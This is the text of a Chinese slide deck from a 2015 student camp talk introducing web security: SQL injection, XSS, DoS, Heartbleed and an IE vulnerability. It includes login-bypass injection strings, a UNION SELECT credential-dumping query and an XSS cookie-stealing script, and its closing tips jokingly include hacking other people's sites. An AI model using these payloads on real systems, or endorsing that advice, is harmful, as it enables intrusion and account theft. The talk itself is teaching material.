資安Talk@2015冬資練

資源
Demo Code:github.com/splitline/2015winter

資訊安全der奇怪講座
@2015冬資練

黃志仁
嘉中電腦社社長
專業Script Kiddle
在VulReport投了12個Vul((但被確認的只有4個QAQ
HITCON CTF 第271/1020 名((很值得炫耀嗎w
Facebook:https://www.facebook.com/OuOwwwwww
About Me

全部都很廢請別在意
剛剛的介紹只是衝頁數

這是一個很黑很可怕的講座

我知道你們被玩的很累
如果覺得太可怕就睡覺吧(？

屁孩&防範
來看幾個某FB社團常見的問題

Q1.可以教我怎麼盜FB帳號嗎?

到底為甚麼會想學黑客?

在某社團搜刮到的回覆……
1. 聽起來很酷炫
2. 可以掌握到別人資料的快感
3. 為了報仇，整人
4. 我是覺得駭客很酷XD
5. …...And You?

XX天才駭客入侵OO網站(?
駭客新聞

破解新聞
高三駭客駭功強駭班導mail改成績((Hi 郭X泰大黑客(##
http://goo.gl/ISDXRh
攻陷1237網站駭客竟是高中生
http://goo.gl/t8s0or
國中生無師自通 14歲駭客專門攻擊學校網站
http://goo.gl/qxvkg3

人人有站駭/
媽勒。這我也會阿(#

哥可以駭掉這個，我超屌
中二病發。

Google(?
Q2.想學駭客，如何開始啊?

在這之前我們來談談…

你對駭客的印象是....?
駭客到底是啥

像現在在喇賽的人一樣帥？

八點檔裡的駭客(((這三小拉ヽ( ` Д´)ﾉ

Hacker vs Cracker
解釋：
● 駭客 vs 黑客
● 白帽 vs 黑帽
● 好人 vs 壞人

如何當駭客?
OK，那麼.....

Most Good der Square Law
最好的方法?

5分鐘洨屁孩就學得會惹XDD
阿，其實當駭客很簡單啊w

Script Kiddie認定。
只要會用滑鼠就可以囉OuO

Let’s Talk About HOLE(?
那麼漏洞到底是毛?

這些都是最近的大洞洞...
● CVE-2014-6332(微軟IE的某個神奇洞洞)
● OpenSSL HeartBleed
● Bash Shellshock
有時間的話再回來講一定沒時間
這些都是洞！

到底為啥會有洞?
天花板沒有洞啊啊啊

上帝說：「要有洞」就有了洞。
千萬不要相信使用者。

朋友輸入了一段留言，中二的暱稱帶屁孩的內文，當她拿給我們看時，
一位對圍棋十分感與趣的同學說：
「啊，好像棋盤似的。」
「我看倒有點像稿紙。」我說。
「真像一堆可以執行的code。」一位外號叫「大黑客」的同學緊接著說。
我們不禁哄堂大笑，同樣的一段留言，每個人卻有不同的感覺。那位朋
友連忙把留言用滑鼠刪掉，她覺得留言就是留言，不是棋盤，也不是稿
紙，更不是code。
使用者的輸入是甚麼?

洨故事大道理
這個故事告訴我們什麼？

千萬不要相信使用者輸入進來的資料
很重要所以說三次

不要相信使用者Part1
SQL injection

SQL快速介紹
SELECT * FROM user
id username password creat_date
1 imuser 123456 2015/02/07
2 a2147483647 qwerty 2015/02/08

SQL快速介紹
SELECT * FROM user WHERE id=1
1 imuser 123456 2015/02/07
2 a2147483647 qwerty 2015/02/08

SQL快速介紹
SELECT * FROM user WHERE id=2
1 imuser 123456 2015/02/07
2 a2147483647 qwerty 2015/02/08

SQL Injection快速介紹
SELECT * FROM user WHERE id=2;DROP table user
1 imuser 123456 2015/02/07
2 a2147483647 qwerty 2015/02/08

UPDATE Students SET Name=(’[user input]’) WHERE id=210682

UPDATE Students SET Name=(’Robert');DROP TABLE Students;-- ’)
WHERE id=210682

好像很厲害
聽過萬能密碼嗎?

這就是萬能密碼
')or('a'='a
or 1=1--
'or 1=1--
a'or' 1=1--
"or 1=1--
'or'a'='a
"or"="a'='a
'or''='
......

我國中校網就有這個漏洞，到現在還沒改…
遊樂場#1

以前的一堆公告系統都是這樣#
大遊樂場#1

view.php?id=2 and 1=2 union select
1,usr,pwd from admin

不要相信使用者Part2
XSS

多功能留言幫你保存帳密哦 <3
大食黑客開始留言了

正常人的留言大黑客的留言
註：這串留言除了我以外其他都是大黑客喔>wO

好吧，沒屁用
跳出一個警告框有毛用?

盜帳號Mode=open
遊樂場#2 Pro/

其實就是盜取cookie
<script>
document.write('<img
src="http://localhost/2015/stealer/steal.php?a=' +
encodeURI(document.cookie) + '"/>')
</script>

如果看到這裡代表我們還有時間
But只會簡單介紹這樣w
/*以下為Plus內容*/

某個因為LoL而走紅的攻擊手法
同場加映:DDoS

啥是DoS?
子曰：「嗨」「嗨」「嗨」「嗨」「嗨」
「嗨」「嗨」「嗨」「嗨」「嗨」「嗨」
「嗨」「嗨」「嗨」「嗨」「嗨」「嗨」
「嗨」「嗨」「嗨」「嗨」「嗨」「嗨」
「嗨」「嗨」「嗨」「嗨」「嗨」「嗨」
「嗨」「嗨」「嗨」「嗨」「嗨」 ……
Denial of Service

啥是DDoS?
子曰：「嗨」孟子曰：「安安」莊子曰：
「QAQ」丁丁說：「你好」小波說：「你好」
迪西說：「你好」拉拉說：「你好」屁孩說：
「阿你不就好棒棒」狗狗說：「汪」貓咪說：「喵」
我說：「呵呵呵」大食客說：「綠豆糕」我又說：
「我真的懶得掰下去了啦」……….
Distributed Denial of Service

DDoS V.S. DoS
兩個有甚麼差別?

DDoS V.S. DoS
相同：你都會崩潰
不同：
DoS 一個人一直該
DDoS 一堆人在該

其實他們有三種
● 網路頻寬消耗型
● 應用資源消耗型
● 系統資源消耗型

如果看到這裡代表時空出現錯亂。
我覺得應該不可能講到這裏

回去簡介近期的那些洞洞
同場加映:近期漏洞

傳說中的IE大洞洞： CVE-2014-6332
影響的範圍：
Win 95~Win 10 && IE 3~IE 11
簡介：
這個洞就是用 VBscript 的陣列錯位方式，將 IE 中原本因為
被Safe mode 限制而權限很低的Vbscript，繞過Safe mode
的限制，然後就可以執行任意指令惹QAQ
(EX: 開啟notepad、新增Administrator帳號)
0x0E => 0x00
http://slides.com/hrjk/little_talk-cve-2014-6332#/

HeartBleed心臟流血
簡單的說，服務器端得到數據包，數據包長度為plen_real，而數據包中
包含一個字節表明有效負載數據長度plen_fake，數據包剩下的部分是有
效負載數據，長度為plen_real-1。整個數據包存儲在一個char型數組之
中。而服務器端構造新數據包時，先分配一段plen_fake+1的內存空間，
前兩個字節存放plen_fake，之後使用memcpy從收到的數據包有效負載
數據起始位置向新數據包拷貝plen_fake字節數據。正常情況下plen_fake
= plen_real-1，當用戶有意設置plen_fake大於實際有效負載長度
plen_real-1時，服務器就會發送plen_fake長度的數據，其中包括
plen_fake - plen_real-1長度的數據，這些數據可能是一些用戶密碼或者
密鑰。
我知道這樣大家看不下去

也就是說...
數據(要求的文字+文字長度)---傳入--->Server
∵文字長度可竄改&Server會相信
∴if(真正的文字長<告訴server的文字長)
Server會回傳許多其他的數據(可能包含一些
隱私資料)

因為台上的這個傢伙也只會基礎的QAQ
同場加映:基礎逆向

你的密碼是怎麼保存在Server的？
同場加映:加密演算法&破解

我要變黑黑！！！？！！！？
● 參加各種conf，區聚以拜見各種黑黑
● 去打Wargame
● 有明確目標(ex.我要寫外掛etc)
● 不要當script kiddie
● 去黑別人站

資安Talk@2015冬資練

Recomendados

Recomendados

Más contenido relacionado

Destacado

Destacado (20)

資安Talk@2015冬資練